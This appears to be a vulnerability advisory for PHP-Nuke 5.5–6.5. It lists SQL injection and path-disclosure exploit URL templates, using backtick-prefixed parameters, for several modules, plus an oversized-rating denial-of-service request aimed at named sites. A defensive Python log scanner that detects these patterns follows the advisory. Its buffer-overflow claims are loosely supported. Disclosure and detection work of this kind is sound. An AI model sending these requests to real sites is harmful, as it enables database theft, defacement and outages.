-------
Product: PHP-Nuke
Vendor: Francisco Burzi
Versions Vulnerable:
  Francisco Burzi PHP-Nuke 6.0
  Francisco Burzi PHP-Nuke 6.5 RC3
  Francisco Burzi PHP-Nuke 6.5 RC2
  Francisco Burzi PHP-Nuke 6.5 RC1
  Francisco Burzi PHP-Nuke 6.5 FINAL
  Francisco Burzi PHP-Nuke 6.5 BETA 1
  Francisco Burzi PHP-Nuke 6.5
  6.5 with all patches, 6.0 with all patches, 5.5 with all patches
Not vulnerable: ?
-------

------
DESCRIPTION:
------
New SQL injections and path disclosures related to the main modules.
Please note the backtick (`) at the start of the injected value in the exploit URLs: other SQL injections do not use it, but here it is essential for building a successful query.

--------
FOUND VULNERABLE MODULES:
--------

--------
- SECTIONS (NEW)
--------
Type: SQL Injection and Path Disclosure
*********
Exploit:
http://[target]/modules.php?name=Sections&op=listarticles&secid=`[YOUR QUERY] (NEW)
- http://[target]/modules.php?name=Sections&op=viewarticle&artid=`[YOUR QUERY] (NEW)
- http://[target]/modules.php?name=Sections&op=printpage&artid==`[YOUR QUERY] (NEW)

--------
- AVANTGO
--------
Type: SQL Injection and Path Disclosure. (NEW)
*********
Exploit:
http://[target]/modules.php?name=AvantGo&file=print&sid=`[YOUR QUERY]

--------
- SURVEYS (NEW)
--------
Type: SQL Injection and Path Disclosure.
********
Exploit:
http://[target]/modules.php?name=Surveys&pollID=`[YOUR QUERY]
- http://[target]/modules.php?name=Surveys&op=results&pollID=`[YOUR QUERY]&mode=&order=0&thold=0

--------
- DOWNLOADS
--------
Type: SQL Injection and Path Disclosure. (NEW)
********
Exploit:
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY]
- http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY]&orderby=titleD

-------------
NEW TYPE OF PHPNUKE ATTACK IN DOWNLOADS MODULE (NEW)
-------------
I found a possible denial of service attack in the Downloads module through the rating system.
Exploit:
http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?&ratinghost_name=?&rating=99999999999999999999999999999999999999999999999999999999999999999999999999
When the file is rated, it gets a rating of 238,609,298.89. This can be used to mount a denial of service attack against the MySQL server, or to send a very long buffer (buffer overflow, stack crashes). The MySQL server stores this value because the query produces an error (more characters in the field than the allowed number of characters); if you send a buffer longer than the allowed/accepted length, the server becomes unstable and the system may go down.
Exploit for SQL Injection and Denial of Service Attack:
http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?&ratinghost_name=?&rating=`[HERE GOES SQL QUERY]

--------
- REVIEWS (NEW)
--------
Type: SQL Injection and Path Disclosure.
********
Exploit:
http://[target]/modules.php?name=Reviews&rop=showcontent&id=`[YOUR QUERY]

--------
- WEB_LINKS
--------
Type: SQL Injection (NEW) and Path Disclosure (NEW).
********
Exploit:
http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=`[YOUR QUERY]
- http://[target]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=`[YOUR QUERY]&ratetype=num
- The Web_Links module is also affected by the possible DoS attack that I discovered, and by the SQL injections and buffer overflows:
Exploit:
http://[target]/modules.php?name=Web_Links&ratinglid=96&ratinguser=?&ratinghost_name=?&rating=[DATA]
[DATA] = your random data to send (rating points and the field buffer, of course).

--------
SOLUTION:
--------
- Deactivate the affected modules entirely.
- A temporary workaround for the path disclosure is to configure the reported error flags in php.ini (no reporting), but this is not a very good solution (WORKAROUND).

-----
WHAT CAN HAPPEN? AND NOTES
-----
Gain access to the PHP-Nuke database, change content, gain access to private info, server paths revealed. MySQL server buffer overflow, MySQL server going down, server going down.

-NOTES-
I tested it on phpnuke-espanol.org and it is vulnerable to all of these.
I tested it on phpnuke.org and it is vulnerable in the active modules affected by this (Downloads, Surveys) (some errors are not reported because php.ini is configured for this, but the vulnerabilities are present).

-----
CONTACT INFO:
---------------------------------------
Lorenzo Manuel Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
-- www.novappc.com --
PGP Key fingerprint: B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
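As an added, defender-side example (not part of the advisory), a small Python scanner that flags access-log requests matching the patterns listed above: a non-numeric (for instance backtick-prefixed) value in one of the numeric parameters the advisory names, or an oversized rating value. The sample log lines are constructed, the module/parameter table is taken from the advisory, and the MAX_RATING_LEN threshold is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not captured from any real server).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2003:10:00:00 +0000] "GET /modules.php?name=Sections&op=listarticles&secid=12 HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2003:10:00:01 +0000] "GET /modules.php?name=Sections&op=listarticles&secid=%60SELECT HTTP/1.1" 200 1024
10.0.0.7 - - [01/Jan/2003:10:00:02 +0000] "GET /modules.php?name=Downloads&ratinglid=5&ratinguser=x&ratinghost_name=y&rating=9999999999999999999999 HTTP/1.1" 302 0
10.0.0.8 - - [01/Jan/2003:10:00:03 +0000] "GET /modules.php?name=Web_Links&l_op=viewlink&cid=7 HTTP/1.1" 200 300
"""

# Modules and the parameters the advisory shows being injected; all are
# expected to carry plain integers in legitimate requests.
NUMERIC_PARAMS = {
    "Sections": ("secid", "artid"),
    "AvantGo": ("sid",),
    "Surveys": ("pollID",),
    "Downloads": ("cid", "ratinglid", "rating"),
    "Reviews": ("id",),
    "Web_Links": ("cid", "ratenum", "ratinglid", "rating"),
}
MAX_RATING_LEN = 2  # assumption: a rating is a small integer (1-10)

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def check_request(uri):
    """Return a list of findings for one request URI (empty if clean)."""
    parts = urlsplit(uri)
    if not parts.path.endswith("/modules.php"):
        return []
    qs = parse_qs(parts.query, keep_blank_values=True)  # decodes %60 -> `
    module = qs.get("name", [""])[0]
    findings = []
    for param in NUMERIC_PARAMS.get(module, ()):
        for value in qs.get(param, []):
            if not value.isdigit():
                findings.append(f"{module}.{param} non-numeric value {value!r}")
            elif param == "rating" and len(value) > MAX_RATING_LEN:
                findings.append(f"{module}.{param} oversized value ({len(value)} digits)")
    return findings

def scan_log(text):
    """Return (line_number, findings) for each suspicious line in the log."""
    results = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m:
            findings = check_request(m.group(1))
            if findings:
                results.append((n, findings))
    return results
```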